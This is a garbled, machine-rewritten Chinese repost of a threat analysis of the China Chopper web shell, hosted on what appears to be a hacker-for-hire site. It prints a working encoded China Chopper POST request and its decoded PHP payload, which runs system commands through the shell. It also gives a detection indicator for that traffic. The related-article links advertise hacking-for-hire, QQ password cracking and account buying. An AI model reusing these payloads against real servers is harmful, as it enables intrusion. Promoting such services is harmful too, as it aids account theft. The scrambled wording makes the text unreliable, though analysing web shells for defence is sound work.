九年后“中国菜刀”依然锋利:China Chopper三起攻击案例分析-黑客接单平台

访客5年前黑客文章1307
曩昔发现的要挟常常会跟着时刻的推移而逐步退出于公众视界中,但China Chopper却坚持了持久的生命力。 在曩昔两年的时刻里,思科Talos团队观察到China Chopper很多活动的踪影,有数个要挟安排将China Chopper融入到其举动中,这表明,即便距China Chopper初次发现现已过了九年,对部分要挟行为者而言它却仍然能起到要害的效果。本文将挑选其间最活泼的三次举动来剖析。 China Chopper是一种web shell,能让进犯者经过包含操控方针所需一切逻辑的客户端应用程序保存对受感染体系的拜访权限。 China Chopper是广泛可用的,简直任何人都可以运用它。这也意味着,仅以China Chopper的存在作为方针,简直不或许将进犯归咎于某个特定集体。 China Chopper的“返老还童”也直接说明晰许多看似老旧要挟永久不会真实消失,互联网的防御者们不应当只把目光放到一些新的歹意软件上。 什么是China Chopper? China Chopper是一类东西,答应进犯者长途操控方针体系,条件是体系需求运转web服务器应用程序。Web shell可以在不同的渠道上运转,但在本例中,咱们只重视受感染的Windows主机。China Chopper已被证明由一些国家支撑的要挟集体,如Leviathan、Threat Group-3390等在运用。 在研讨中咱们发现,Internet Information Services (IIS)和Apache web服务器都受到过China Chopper web shell的进犯。咱们没有关于web shell是怎么装置的信息,可是考虑到有一些web应用程序结构,比方老版别的Oracle WebLogic或WordPress,它们傍边包含的长途代码履行缝隙或许使自己成了进犯方针。 China Chopper为进犯者供给了一个简略的GUI,答应他们装备到服务器的链接,并生成服务器端代码,这些代码有必要添加到方针网站的代码后才干进行通讯。 图1.China Chopper GUI 服务器端代码十分简略,只包含一行代码,依据应用程序渠道的不同有所改动。后门支撑.NET Active Server Pages或PHP。 以下是受感染的PHP应用程序的服务器端代码示例: 咱们并不能确认,服务器代码的如此简略是否是China Chopper开发人员为了添加检测的难度而故意为之,可是在短代码片段上运用形式匹配或许会发生一些误报。 China Chopper客户端运用HTTP POST恳求与受感染的服务器通讯。服务器端代码的仅有功用是评价在客户端GUI中装备服务器代码期间指定的恳求参数。在咱们的示例中,预期的参数名称是“test”。经过HTTP的通讯,可以很简单在捕获 *** 数据包后发现。 China Chopper包含一个长途shell(虚拟终端)功用,它首要会主张运用指令 'netstat an|find "ESTABLISHED."',在受感染体系上的进程创立日志中很或许会看到此指令。 图2.China Chopper首要主张的终端指令 当咱们剖析捕获的数据包时,可以看到参数“test”包含另一个eval句子。 依据该指令,客户端将提交必定数量的参数,z0一直到zn。在提交之前,一切参数都运用规范base64编码器进行编码。参数z0一直包含解析其他参数、发动恳求的指令并将成果回来给客户机的代码。 带参数的编码China Chopper POST恳求: test=%40eval%01%28base64_decode%28%24_POST%5Bz0%5D%29%29%3B&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2BfCIpOzskcD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JHM9YmFzZTY0X2RlY29kZSgkX1BPU1RbInoyIl0pOyRkPWRpcm5hbWUoJF9TRVJWRVJbIlNDUklQVF9GSUxFTkFNRSJdKTskYz1zdWJzdHIoJGQsMCwxKT09Ii8iPyItYyBcInskc31cIiI6Ii9jIFwieyRzfVwiIjskcj0ieyRwfSB7JGN9IjtAc3lzdGVtKCRyLiIgMj4mMSIsJHJldCk7cHJpbnQgKCRyZXQhPTApPyIKcmV0PXskcmV0fQoiOiIiOztlY2hvKCJ8PC0iKTtkaWUoKTs%3D&z1=Y21k&z2=Y2QgL2QgIkM6XHhhbXBwXGh0ZG9jc1xkYXNoYm9hcmRcIiZuZXRzdGF0IC1hbiB8IGZpbmQgIkVTVEFCTElTSEVEIiZlY2hvIFtTXSZjZCZlY2hvIFtFXQ%3D%3D 在此恳求中,解码的参数是: z0 - @ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$p=base64_decode($_POST["z1"]);$s=base64_decode($_POST["z2"]);$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c "{$s}"":"/c "{$s}"";$r="{$p} {$c}";@system($r." 2>&1",$ret);print ($ret!=0)?" ret={$ret} ":"";;echo("| 指令的结尾“&echo [S]&cd&echo [E]”好像出现在一切虚拟终端恳求中,可以作为一个牢靠的指示器来检测数据包捕获或行为日志中的China Chopper活动。 除了终端,China Chopper还包含一个文件管理器(可以创立目录、下载文件和更改文件元数据)、一个数据库管理器和一个根本的缝隙扫描器。 下面是咱们对三次举动的论说,它们别离有不同的方针、东西、技能及(或许不同的)要挟团伙。 图3.观察到的事例研讨的时刻表 事例研讨1:针对亚洲 *** 安排的特务举动 咱们在几回特务活动中确认了China Chopper的运用情况,其间一次针对亚洲 *** 安排的举动中,China Chopper被用于内部 *** ,装置在了一些用于存储秘要文档的Web服务器[1][2][3]黑客接单网

相关文章

网站常见的反爬虫和应对办法

 在咱们的对2019年大数据职业的猜测文章《2019年大数据将走下神坛拥抱日子 本钱喜爱创业时机多》里,咱们从前说到“在2019年,避免网站数据爬取将变成一种生意。”。今日我找到了来自”BSDR“的一...

在哪里可以找黑客接单?网络黑客高手联系方式

在哪里可以找黑客接单?网络黑客高手联系方式

在哪里可以找黑客接单 XS问答指南 一、他们遭受了苦难,但他们做了同样的事。使用自学DDoS技术攻击国内外服务器,导致政府网页访问不畅、学校网页发布通知不顺畅、娱乐网页运行不顺利、游戏网页未正...

破解qq密码软件

· 一名23岁的澳大利亚女子因偷盗 10万个XRP被捕。 该女子进犯了一名 56 岁的加密使用者的钱包,并将价值 46000 美元的Ripple转移到一家我国加密钱银买卖所。 附录3、关于360天擎新...

网上有黑客接单吗_找黑客买账号

APT进犯者一般会运用一些文件格局和显现上的特性用于利诱受害用户或安全剖析人员。 这儿以LNK文件为例,LNK文件显现的方针履行途径仅260个字节,剩余的字符将被切断,可以直接检查LNK文件履行的指令...

加密压缩包,淘宝找黑客改护师考试成绩,看门狗2如何找黑客

图15 GFSK解调脚本作业图左翻右翻,经过了一系列困难的电焊拆解和吹风机刮除维护膜后,总算找到了担任射频通讯的芯片和担任逻辑的主控芯片,并辨认出了它们的类型。 看得出来大疆对电路板故意做了一些防拆解...

方人生读什么,微信记录找黑客能删除吗,微信被封找黑客能解开是真的吗

# a2enmod dav 首要,找到你方才JDK的装置目录,例如,本文中,我电脑的JDK方才装置在C:Program FilesJavajdk1.8.0_40目录下:gids[99]='&am...